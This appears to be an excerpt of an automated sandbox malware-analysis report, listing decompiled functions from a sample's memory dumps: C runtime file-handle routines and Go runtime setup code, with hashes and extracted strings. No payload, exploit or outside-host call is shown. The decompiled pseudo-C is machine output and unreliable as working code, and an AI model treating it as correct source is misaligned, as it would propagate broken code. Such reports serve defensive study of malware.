                                                                                                                            Function 0000025BF8AD0C64 Relevance: 13.6, APIs: 9, Instructions: 89COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_unlock_fhandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2464146582-0
                                                                                                                            • Opcode ID: 66a6b6c1bf5ba65b1d7d9ec8d345855fa95ce804db8e647d6f2a022bd571f430
                                                                                                                            • Instruction ID: f182d32c71bbbf5e12929f1719272eb54b6046668d9908e61065dfb7eec72c46
                                                                                                                            • Opcode Fuzzy Hash: 66a6b6c1bf5ba65b1d7d9ec8d345855fa95ce804db8e647d6f2a022bd571f430
                                                                                                                            • Instruction Fuzzy Hash: 8621F333608A004EFB166B28DC4E3783691EB86332F25020DF056C75E3DB749851827E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8AD048C Relevance: 13.6, APIs: 9, Instructions: 71COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno_unlock_fhandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2140805544-0
                                                                                                                            • Opcode ID: c7e16f6995ac432e7f399cb2b3602af33cbdf35393ed5024deaedf5a6a5ff7ed
                                                                                                                            • Instruction ID: 7edae16a06721ce6f21ffb4ea6d4a91bab15998558fadb4e8c727da46eb8902a
                                                                                                                            • Opcode Fuzzy Hash: c7e16f6995ac432e7f399cb2b3602af33cbdf35393ed5024deaedf5a6a5ff7ed
                                                                                                                            • Instruction Fuzzy Hash: D921A133509E044EFF166B249C8E3697692EB46332F31955CF81AC79E3D77488408379
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A81838 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 56%
                                                                                                                            			E0000025B25BF8A81838(signed int __ebx, signed int __ecx, void* __edx, void* __edi, signed int* __rax, long long __rbx, void* __rdx, signed int _a8, long long _a16) {
				void* __rdi;
				void* __rsi;
				void* _t21;
				void* _t35;
				signed long long _t40;
				signed long long _t41;
				signed long long _t45;
				signed long long _t53;

				_a16 = __rbx;
				_a8 = __ecx;
				r14d = r8d;
				if (__edi != 0xfffffffe) goto 0xf8a81873;
				E0000025B25BF8A7B82C(__rax);
				 *__rax =  *__rax & 0x00000000;
				E0000025B25BF8A7B89C(__rax);
				 *__rax = 9;
				goto 0xf8a81905;
				if (__ecx < 0) goto 0xf8a818ed;
				_t35 = __edi -  *0xf8aa7384;
				if (_t35 >= 0) goto 0xf8a818ed;
				_t53 = __ecx >> 5;
				_t45 = __ecx * 0x58;
				if (_t35 == 0) goto 0xf8a818ed;
				E0000025B25BF8A83FA8(__ebx & 0x0000001f, __edi, _t45, __ecx, _t53);
				_t40 =  *((intOrPtr*)(0xf8aa3200 + _t53 * 8));
				if (( *(_t40 + _t45 + 8) & 0x00000001) == 0) goto 0xf8a818ca;
				r8d = r14d;
				E0000025B25BF8A8191C(__ebx & 0x0000001f, __edi, _t40, _t45, __rdx, _t53);
				goto 0xf8a818e1;
				E0000025B25BF8A7B89C(_t40);
				 *_t40 = 9;
				E0000025B25BF8A7B82C(_t40);
				 *_t40 =  *_t40 & 0x00000000;
				0xf8a84408();
				_t41 = _t40 | 0xffffffff;
				goto 0xf8a81909;
				E0000025B25BF8A7B82C(_t41);
				 *_t41 =  *_t41 & 0x00000000;
				_t21 = E0000025B25BF8A7B89C(_t41);
				 *_t41 = 9;
				return E0000025B25BF8A7BEC4(_t21);
			}











                                                                                                                            0x25bf8a81838
                                                                                                                            0x25bf8a8183d
                                                                                                                            0x25bf8a8184d
                                                                                                                            0x25bf8a81859
                                                                                                                            0x25bf8a8185b
                                                                                                                            0x25bf8a81860
                                                                                                                            0x25bf8a81863
                                                                                                                            0x25bf8a81868
                                                                                                                            0x25bf8a8186e
                                                                                                                            0x25bf8a81875
                                                                                                                            0x25bf8a81877
                                                                                                                            0x25bf8a8187d
                                                                                                                            0x25bf8a81885
                                                                                                                            0x25bf8a81893
                                                                                                                            0x25bf8a818a3
                                                                                                                            0x25bf8a818a7
                                                                                                                            0x25bf8a818ad
                                                                                                                            0x25bf8a818b6
                                                                                                                            0x25bf8a818b8
                                                                                                                            0x25bf8a818c0
                                                                                                                            0x25bf8a818c8
                                                                                                                            0x25bf8a818ca
                                                                                                                            0x25bf8a818cf
                                                                                                                            0x25bf8a818d5
                                                                                                                            0x25bf8a818da
                                                                                                                            0x25bf8a818e3
                                                                                                                            0x25bf8a818e8
                                                                                                                            0x25bf8a818eb
                                                                                                                            0x25bf8a818ed
                                                                                                                            0x25bf8a818f2
                                                                                                                            0x25bf8a818f5
                                                                                                                            0x25bf8a818fa
                                                                                                                            0x25bf8a8191a

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4140391395-0
                                                                                                                            • Opcode ID: d13ca485162102a3b12b761681dd095557853d3d567b1ad292b426a3558c3d88
                                                                                                                            • Instruction ID: 74ffed4e07e179765d20628b242163dae9d34320f0e45e4f574698c4a28090dd
                                                                                                                            • Opcode Fuzzy Hash: d13ca485162102a3b12b761681dd095557853d3d567b1ad292b426a3558c3d88
                                                                                                                            • Instruction Fuzzy Hash: 81216A73600D4045FE132B65AC4A7AD6A51E780BB3F294714FA350AAD2C7788842DB3C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A816C0 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 60%
                                                                                                                            			E0000025B25BF8A816C0(signed int __ebx, signed int __ecx, void* __edx, void* __edi, signed int* __rax, long long __rbx, signed int _a8, long long _a16) {
				void* __rdi;
				void* __rsi;
				void* _t22;
				void* _t40;
				signed int* _t45;
				signed long long _t48;
				signed long long _t52;

				_a16 = __rbx;
				_a8 = __ecx;
				r14d = r8d;
				r15d = __edx;
				if (__edi != 0xfffffffe) goto 0xf8a816fb;
				E0000025B25BF8A7B82C(__rax);
				 *__rax =  *__rax & 0x00000000;
				E0000025B25BF8A7B89C(__rax);
				 *__rax = 9;
				goto 0xf8a8178a;
				if (__ecx < 0) goto 0xf8a81772;
				_t40 = __edi -  *0xf8aa7384;
				if (_t40 >= 0) goto 0xf8a81772;
				_t52 = __ecx >> 5;
				_t48 = __ecx * 0x58;
				if (_t40 == 0) goto 0xf8a81772;
				E0000025B25BF8A83FA8(__ebx & 0x0000001f, __edi, _t48, __ecx, _t52);
				_t45 =  *((intOrPtr*)(0xf8aa3200 + _t52 * 8));
				if (( *(_t45 + _t48 + 8) & 0x00000001) == 0) goto 0xf8a81751;
				r8d = r14d;
				E0000025B25BF8A817A0(__ebx & 0x0000001f, __edi, r15d, _t45, _t48, _t52);
				goto 0xf8a81767;
				E0000025B25BF8A7B89C(_t45);
				 *_t45 = 9;
				E0000025B25BF8A7B82C(_t45);
				 *_t45 =  *_t45 & 0x00000000;
				0xf8a84408();
				goto 0xf8a8178d;
				E0000025B25BF8A7B82C(_t45);
				 *_t45 =  *_t45 & 0x00000000;
				_t22 = E0000025B25BF8A7B89C(_t45);
				 *_t45 = 9;
				return E0000025B25BF8A7BEC4(_t22) | 0xffffffff;
			}










                                                                                                                            0x25bf8a816c0
                                                                                                                            0x25bf8a816c5
                                                                                                                            0x25bf8a816d5
                                                                                                                            0x25bf8a816d8
                                                                                                                            0x25bf8a816e1
                                                                                                                            0x25bf8a816e3
                                                                                                                            0x25bf8a816e8
                                                                                                                            0x25bf8a816eb
                                                                                                                            0x25bf8a816f0
                                                                                                                            0x25bf8a816f6
                                                                                                                            0x25bf8a816fd
                                                                                                                            0x25bf8a816ff
                                                                                                                            0x25bf8a81705
                                                                                                                            0x25bf8a8170d
                                                                                                                            0x25bf8a8171b
                                                                                                                            0x25bf8a8172b
                                                                                                                            0x25bf8a8172f
                                                                                                                            0x25bf8a81735
                                                                                                                            0x25bf8a8173e
                                                                                                                            0x25bf8a81740
                                                                                                                            0x25bf8a81748
                                                                                                                            0x25bf8a8174f
                                                                                                                            0x25bf8a81751
                                                                                                                            0x25bf8a81756
                                                                                                                            0x25bf8a8175c
                                                                                                                            0x25bf8a81761
                                                                                                                            0x25bf8a81769
                                                                                                                            0x25bf8a81770
                                                                                                                            0x25bf8a81772
                                                                                                                            0x25bf8a81777
                                                                                                                            0x25bf8a8177a
                                                                                                                            0x25bf8a8177f
                                                                                                                            0x25bf8a8179e

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 310312816-0
                                                                                                                            • Opcode ID: c77d8221c3d2fa32162d4f967970c43185e40598afa946d756d5ee2bd82690bf
                                                                                                                            • Instruction ID: 4cd3c4036b49f216570b8943c214ec2c8630ae4996ce0f15f8c67aa6b688dbd4
                                                                                                                            • Opcode Fuzzy Hash: c77d8221c3d2fa32162d4f967970c43185e40598afa946d756d5ee2bd82690bf
                                                                                                                            • Instruction Fuzzy Hash: 86218E7361094046FF132F25ED493AD6A91E7807B3F694518FA2507AD2CB788842CB7C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 01309FA0 Relevance: 12.7, Strings: 10, Instructions: 155COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 79%
                                                                                                                            			E01309FA0(signed char __ecx, signed long long __rax, long long __rbp, void* __r14) {
				char _v8;
				void* _v16;
				void* _t58;
				signed char _t76;
				void* _t77;
				void* _t79;
				void* _t80;
				signed long long _t92;
				intOrPtr _t96;
				intOrPtr _t101;
				intOrPtr _t106;
				intOrPtr _t110;
				long long _t113;
				signed long long _t118;
				signed long long _t119;
				signed long long _t121;
				long long _t122;
				void* _t128;
				void* _t132;

				L0:
				while(1) {
					L0:
					_t132 = __r14;
					_t126 = __rbp;
					_t92 = __rax;
					_t76 = __ecx;
					if(_t128 <=  *((intOrPtr*)(__r14 + 0x10))) {
						goto L26;
					}
					L1:
					_v8 = __rbp;
					_t126 =  &_v8;
					if( *0x1468364 != 0x10) {
						L25:
						E01330BA0(0x1388b53, _t115, _t126);
						goto L26;
					}
					L2:
					L4:
					while(_t92 < 0x44) {
						_t78 =  *(0x1468360 + _t92 * 2) & 0x0000ffff;
						 *(0x14d20d0 + (_t92 + _t92 * 2) * 8) =  *(0x1468360 + _t92 * 2) & 0x0000ffff;
						_t92 = _t92 + 1;
						__eflags = _t92;
					}
					_t123 =  *0x14cf478; // 0x1000
					if(_t123 == 0) {
						L24:
						E01330BA0(0x138c0c4, _t115, _t126);
						goto L25;
					}
					L6:
					if(_t123 > 0x80000) {
						L23:
						E01332340(_t123, _t126, _t132);
						E01332C40(_t76, _t78, _t79, _t80, 0x138906a, _t115, _t126, _t132);
						_t96 =  *0x14cf478; // 0x1000
						E01332940(_t78, _t79, _t80, _t96, _t118, _t126, _t132);
						E01332C40(_t76, _t78, _t79, _t80, 0x138cfaf, _t115, _t126, _t132);
						E01332A40(_t76, _t77, _t78, _t79, _t80, 0x138cfaf, 0x1468360, _t126, _t132);
						E01332C40(_t76, _t78, _t79, _t80, 0x13867b1, _t115, _t126, _t132);
						L013323C0(_t123, _t126, _t132);
						E01330BA0(0x1389824, _t115, _t126);
						goto L24;
					}
					L7:
					if(_t123 < 0x1000) {
						L22:
						E01332340(_t123, _t126, _t132);
						E01332C40(_t76, _t78, _t79, _t80, 0x138906a, _t115, _t126, _t132);
						_t101 =  *0x14cf478; // 0x1000
						E01332940(_t78, _t79, _t80, _t101, _t118, _t126, _t132);
						E01332C40(_t76, _t78, _t79, _t80, 0x138d1ef, _t115, _t126, _t132);
						E01332A40(_t76, _t77, _t78, _t79, _t80, 0x138d1ef, 0x1468360, _t126, _t132);
						E01332C40(_t76, _t78, _t79, _t80, 0x13867b1, _t115, _t126, _t132);
						L013323C0(_t123, _t126, _t132);
						E01330BA0(0x1389824, _t115, _t126);
						goto L23;
					}
					L8:
					_t10 = _t123 - 1; // 0xfff
					_t115 = _t10;
					if((_t123 & _t10) != 0) {
						L21:
						E01332340(_t123, _t126, _t132);
						E01332C40(_t76, _t78, _t79, _t80, 0x138906a, _t115, _t126, _t132);
						_t106 =  *0x14cf478; // 0x1000
						E01332940(_t78, _t79, _t80, _t106, _t118, _t126, _t132);
						E01332C40(_t76, _t78, _t79, _t80, 0x138a37c, _t115, _t126, _t132);
						L013323C0(_t123, _t126, _t132);
						E01330BA0(0x1389824, _t115, _t126);
						goto L22;
					}
					L9:
					_t123 =  *0x14cf470; // 0x0
					_t13 = _t123 - 1; // -1
					_t115 = _t13;
					if((_t123 & _t115) != 0) {
						L20:
						E01332340(_t123, _t126, _t132);
						E01332C40(_t76, _t78, _t79, _t80, 0x138a8b2, _t115, _t126, _t132);
						_t110 =  *0x14cf470; // 0x0
						E01332940(_t78, _t79, _t80, _t110, _t118, _t126, _t132);
						E01332C40(_t76, _t78, _t79, _t80, 0x138a37c, _t115, _t126, _t132);
						L013323C0(_t123, _t126, _t132);
						E01330BA0(0x138ae97, _t115, _t126);
						goto L21;
					}
					L10:
					if(_t123 > 0x400000) {
						 *0x14cf470 = 0;
					}
					if( *0x14cf470 != 0) {
						while(1) {
							L18:
							_t118 =  *0x14cf468; // 0x0
							__eflags = _t118 - 0x40;
							asm("dec eax");
							_t115 = _t115 << _t76 & _t123;
							__eflags =  *0x14cf470 - _t115; // 0x0
							if(__eflags == 0) {
								break;
							}
							L17:
							_t21 = _t118 + 1; // 0x1
							_t123 = _t21;
							 *0x14cf468 = _t123;
						}
						L19:
					}
					L13:
					_t113 = 0x14915c0;
					E01321580(0, 0x14915c0, _t115, _t126, 0x14d20d0, _t132);
					E01311D00(1, _t78, _t118, _t126, _t132);
					 *0x14cf430 = 0x14915c0;
					_t58 = 0x7f;
					L15:
					while(_t113 >= 0) {
						_v16 = _t113;
						_t58 = E013147A0(1, _t76, _t77, _t78, _t79, 0x14a8168, _t123, _t126, _t132);
						_t119 = _v16;
						_t123 = _t119;
						_t121 = _t119 << 0x00000028 | 0x00000000;
						__eflags = _t121;
						 *0x14a8168 = _t121;
						_t122 =  *0x14a1970; // 0x25bf3784cd0
						 *0x014A8178 = _t122;
						 *0x14a1970 = 0x14a8168;
						_t113 = _t119 - 1;
					}
					return _t58;
					L27:
					L26:
					E01356200(_t123, _t126);
				}
			}






















                                                                                                                            0x01309fa0
                                                                                                                            0x01309fa0
                                                                                                                            0x01309fa0
                                                                                                                            0x01309fa0
                                                                                                                            0x01309fa0
                                                                                                                            0x01309fa0
                                                                                                                            0x01309fa0
                                                                                                                            0x01309fa4
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x01309faa
                                                                                                                            0x01309fae
                                                                                                                            0x01309fb3
                                                                                                                            0x01309fc0
                                                                                                                            0x0130a28c
                                                                                                                            0x0130a298
                                                                                                                            0x00000000
                                                                                                                            0x0130a298
                                                                                                                            0x01309fc6
                                                                                                                            0x00000000
                                                                                                                            0x01309fe7
                                                                                                                            0x01309fd5
                                                                                                                            0x01309fe0
                                                                                                                            0x01309fe4
                                                                                                                            0x01309fe4
                                                                                                                            0x01309fe4
                                                                                                                            0x01309fed
                                                                                                                            0x01309ff7
                                                                                                                            0x0130a27b
                                                                                                                            0x0130a287
                                                                                                                            0x00000000
                                                                                                                            0x0130a287
                                                                                                                            0x0130a000
                                                                                                                            0x0130a007
                                                                                                                            0x0130a20c
                                                                                                                            0x0130a20c
                                                                                                                            0x0130a220
                                                                                                                            0x0130a225
                                                                                                                            0x0130a22c
                                                                                                                            0x0130a240
                                                                                                                            0x0130a24a
                                                                                                                            0x0130a260
                                                                                                                            0x0130a265
                                                                                                                            0x0130a276
                                                                                                                            0x00000000
                                                                                                                            0x0130a276
                                                                                                                            0x0130a00d
                                                                                                                            0x0130a014
                                                                                                                            0x0130a1a0
                                                                                                                            0x0130a1a0
                                                                                                                            0x0130a1b1
                                                                                                                            0x0130a1b6
                                                                                                                            0x0130a1c0
                                                                                                                            0x0130a1d1
                                                                                                                            0x0130a1e0
                                                                                                                            0x0130a1f1
                                                                                                                            0x0130a1f6
                                                                                                                            0x0130a207
                                                                                                                            0x00000000
                                                                                                                            0x0130a207
                                                                                                                            0x0130a01a
                                                                                                                            0x0130a01a
                                                                                                                            0x0130a01a
                                                                                                                            0x0130a023
                                                                                                                            0x0130a14e
                                                                                                                            0x0130a14e
                                                                                                                            0x0130a160
                                                                                                                            0x0130a165
                                                                                                                            0x0130a16c
                                                                                                                            0x0130a180
                                                                                                                            0x0130a185
                                                                                                                            0x0130a196
                                                                                                                            0x00000000
                                                                                                                            0x0130a196
                                                                                                                            0x0130a029
                                                                                                                            0x0130a029
                                                                                                                            0x0130a030
                                                                                                                            0x0130a030
                                                                                                                            0x0130a037
                                                                                                                            0x0130a105
                                                                                                                            0x0130a105
                                                                                                                            0x0130a116
                                                                                                                            0x0130a11b
                                                                                                                            0x0130a122
                                                                                                                            0x0130a133
                                                                                                                            0x0130a138
                                                                                                                            0x0130a149
                                                                                                                            0x00000000
                                                                                                                            0x0130a149
                                                                                                                            0x0130a040
                                                                                                                            0x0130a047
                                                                                                                            0x0130a049
                                                                                                                            0x0130a049
                                                                                                                            0x0130a05c
                                                                                                                            0x0130a0da
                                                                                                                            0x0130a0da
                                                                                                                            0x0130a0da
                                                                                                                            0x0130a0e1
                                                                                                                            0x0130a0e5
                                                                                                                            0x0130a0f0
                                                                                                                            0x0130a0f3
                                                                                                                            0x0130a0fa
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0130a0cf
                                                                                                                            0x0130a0cf
                                                                                                                            0x0130a0cf
                                                                                                                            0x0130a0d3
                                                                                                                            0x0130a0d3
                                                                                                                            0x0130a100
                                                                                                                            0x0130a100
                                                                                                                            0x0130a05e
                                                                                                                            0x0130a05e
                                                                                                                            0x0130a065
                                                                                                                            0x0130a06a
                                                                                                                            0x0130a06f
                                                                                                                            0x0130a076
                                                                                                                            0x00000000
                                                                                                                            0x0130a0c0
                                                                                                                            0x0130a07d
                                                                                                                            0x0130a089
                                                                                                                            0x0130a08e
                                                                                                                            0x0130a093
                                                                                                                            0x0130a0a4
                                                                                                                            0x0130a0a4
                                                                                                                            0x0130a0a7
                                                                                                                            0x0130a0aa
                                                                                                                            0x0130a0b1
                                                                                                                            0x0130a0b5
                                                                                                                            0x0130a0bc
                                                                                                                            0x0130a0bc
                                                                                                                            0x0130a0ce
                                                                                                                            0x00000000
                                                                                                                            0x0130a2a0
                                                                                                                            0x0130a2a0
                                                                                                                            0x0130a2a0

                                                                                                                            Strings
                                                                                                                            • failed to get system page sizefreedefer with d._panic != nilinappropriate ioctl for deviceinvalid pointer found on stacknotetsleep - waitm out of syncprotocol wrong type for socketrunqputslow: queue is not fullruntime: bad g in cgocallbackruntime: bad pointer, xrefs: 0130A27B
                                                                                                                            • bad system huge page sizechansend: spurious wakeupcheckdead: no m for timerinconsistent poll.fdMutexinvalid cross-device linkmissing stack in newstackmissing traceGCSweepStartno buffer space availableno such device or addressoperation now in progressreleasep: , xrefs: 0130A13D
                                                                                                                            • system huge page size (work.nwait > work.nprocAzerbaijan Standard TimeBangladesh Standard TimeCape Verde Standard TimeCertFreeCertificateChainCreateToolhelp32SnapshotGetUserProfileDirectoryWMagallanes Standard TimeMontevideo Standard TimeNorth Asia Standard Ti, xrefs: 0130A10A
                                                                                                                            • bad system page sizebad use of bucket.bpbad use of bucket.mpchan send (nil chan)close of nil channelconnection timed outdodeltimer0: wrong Pfloating point errorforcegc: phase errorgo of nil func valuegopark: bad g statusinconsistent lockedminvalid request code, xrefs: 0130A18A, 0130A1FB, 0130A26A
                                                                                                                            • bad TinySizeClassdebugPtrmask.lockentersyscallblockexec format errorg already scannedglobalAlloc.mutexlocked m0 woke upmark - bad statusmarkBits overflowno data availablenotetsleepg on g0permission deniedreflect: call of runtime.newosprocruntime/internal/runti, xrefs: 0130A28C
                                                                                                                            • system page size (tracebackancestorsuse of closed filevalue out of range [controller reset] called using nil *, g->atomicstatus=, gp->atomicstatus=Altai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreateSymbolicLinkWCryptReleaseConte, xrefs: 0130A153, 0130A1A5, 0130A211
                                                                                                                            • ), ->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJ, xrefs: 0130A1E5, 0130A24F
                                                                                                                            • ) must be a power of 2Argentina Standard TimeAstrakhan Standard TimeCertGetCertificateChainDestroyEnvironmentBlockE. Africa Standard TimeE. Europe Standard TimeFreeEnvironmentStringsWGetEnvironmentVariableWGetSystemTimeAsFileTimeGreenland Standard TimeGreenwi, xrefs: 0130A127, 0130A171
                                                                                                                            • ) is smaller than minimum page size (_cgo_notify_runtime_init_done missingall goroutines are asleep - deadlock!cannot exec a shared library directlycipher: message authentication failedcrypto/cipher: invalid buffer overlapfailed to reserve page summary memoryi, xrefs: 0130A1C5
                                                                                                                            • ) is larger than maximum page size () is not Grunnable or Gscanrunnable0123456789abcdefghijklmnopqrstuvwxyzGo pointer stored into non-Go memoryUnable to determine system directoryaccessing a corrupted shared libraryruntime: VirtualQuery failed; errno=runtime:, xrefs: 0130A231
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ), ->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJ$) is larger than maximum page size () is not Grunnable or Gscanrunnable0123456789abcdefghijklmnopqrstuvwxyzGo pointer stored into non-Go memoryUnable to determine system directoryaccessing a corrupted shared libraryruntime: VirtualQuery failed; errno=runtime:$) is smaller than minimum page size (_cgo_notify_runtime_init_done missingall goroutines are asleep - deadlock!cannot exec a shared library directlycipher: message authentication failedcrypto/cipher: invalid buffer overlapfailed to reserve page summary memoryi$) must be a power of 2Argentina Standard TimeAstrakhan Standard TimeCertGetCertificateChainDestroyEnvironmentBlockE. Africa Standard TimeE. Europe Standard TimeFreeEnvironmentStringsWGetEnvironmentVariableWGetSystemTimeAsFileTimeGreenland Standard TimeGreenwi$bad TinySizeClassdebugPtrmask.lockentersyscallblockexec format errorg already scannedglobalAlloc.mutexlocked m0 woke upmark - bad statusmarkBits overflowno data availablenotetsleepg on g0permission deniedreflect: call of runtime.newosprocruntime/internal/runti$bad system huge page sizechansend: spurious wakeupcheckdead: no m for timerinconsistent poll.fdMutexinvalid cross-device linkmissing stack in newstackmissing traceGCSweepStartno buffer space availableno such device or addressoperation now in progressreleasep: $bad system page sizebad use of bucket.bpbad use of bucket.mpchan send (nil chan)close of nil channelconnection timed outdodeltimer0: wrong Pfloating point errorforcegc: phase errorgo of nil func valuegopark: bad g statusinconsistent lockedminvalid request code$failed to get system page sizefreedefer with d._panic != nilinappropriate ioctl for deviceinvalid pointer found on stacknotetsleep - waitm out of syncprotocol wrong type for socketrunqputslow: queue is not fullruntime: bad g in cgocallbackruntime: bad pointer$system huge page size (work.nwait > work.nprocAzerbaijan Standard TimeBangladesh Standard TimeCape Verde Standard TimeCertFreeCertificateChainCreateToolhelp32SnapshotGetUserProfileDirectoryWMagallanes Standard TimeMontevideo Standard TimeNorth Asia Standard Ti$system page size (tracebackancestorsuse of closed filevalue out of range [controller reset] called using nil *, g->atomicstatus=, gp->atomicstatus=Altai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreateSymbolicLinkWCryptReleaseConte
                                                                                                                            • API String ID: 0-4108490159
                                                                                                                            • Opcode ID: 20a4c6e40e68071e8d9d2fa80effe129e55b1d0a52d505d531c0d9fe14491a4b
                                                                                                                            • Instruction ID: 47658648e8793a639eb0a1c3dc324a2a5b6a8325407a405882da7623ebbf6b72
                                                                                                                            • Opcode Fuzzy Hash: 20a4c6e40e68071e8d9d2fa80effe129e55b1d0a52d505d531c0d9fe14491a4b
                                                                                                                            • Instruction Fuzzy Hash: 4F616971311B4685EB09EB68E8903DA77A9EBA878CF844432DA4D07371DF3CC589C365
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8ACAA78 Relevance: 12.6, APIs: 10, Instructions: 116COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: free$BoundaryDeleteDescriptor_errno
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3555341564-0
                                                                                                                            • Opcode ID: 50c98f4714fd4594761e6b4e8a20afdbdebcaf9c69dafa40b21d10a3d1af1587
                                                                                                                            • Instruction ID: c3c7281202f1e7a664a4ea00e2fd88a15d4c20186956cacb2caba9b1425fde66
                                                                                                                            • Opcode Fuzzy Hash: 50c98f4714fd4594761e6b4e8a20afdbdebcaf9c69dafa40b21d10a3d1af1587
